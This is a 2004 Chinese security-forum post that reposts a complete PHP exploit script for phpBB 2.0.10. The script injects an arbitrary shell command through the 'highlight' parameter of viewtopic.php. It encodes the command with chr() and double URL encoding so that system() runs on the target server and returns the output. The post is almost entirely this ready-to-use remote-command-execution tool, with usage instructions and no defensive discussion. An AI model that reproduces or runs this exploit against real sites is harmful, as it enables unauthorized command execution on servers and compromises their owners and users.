‹‹ 上一主题 | 下一主题 ››
发新话题
打印

phpBB highlight parameter Processing Remote Execution Exploit

EvilOctal

团队执行官

Rank: 8Rank: 8

E.S.T社区执行帐号

帖子
9861 
精华
771 
积分
40900 
阅读权限
200 
性别
男 
在线时间
3984 小时 
注册时间
2004-7-4 
最后登录
2008-11-18 
楼主 发表于 2004-11-22 12:43  只看该作者

phpBB highlight parameter Processing Remote Execution Exploit

文章作者:pokleyzz
复制内容到剪贴板
代码:
#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark (www howdark com) (1st October 2004)
#
# Requirement:
#
#   PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

if (!(function_exists(&#39;curl_init&#39;))) {
   echo "cURL extension required\n";
   exit;
}

if ($argv[2]){
   $url = $argv[1];
   $command = $argv[2];
}
else {
   echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
   echo "\tURL\t URL to phpnBB site (ex: [url]http://127.0.0.1/html[/url])\n";
   echo "\tcommand\t command to execute on server (ex: &#39;ls -la&#39;)\n";
   echo "\ttopic_id\t topic id\n";
   echo "\tproxy\t optional proxy url (ex: [url]http://10.10.10.10:8080[/url])\n";
   exit;
}
if ($argv[3])
   $topic = $argv[3];
else
   $topic = 1;

if ($argv[4])
   $proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";     
$ch=curl_init();
if ($proxy){
   curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

   for($i = 0;$i < strlen($str);$i++){
      $chr .= "chr(".ord($str{$i}).")";
      if ($i != strlen($str) -1)
         $chr .= "%252e";   
   }
   return $chr;
}
?>
曾几何时,有人对我说:装B遭雷劈。我说:去你妈的。于是,这个人又对我说:如果再说脏话,上帝会惩罚你的。我说:我操上帝。结论:彪悍的人生不需要上帝。

TOP

‹‹ 上一主题 | 下一主题 ››
发新话题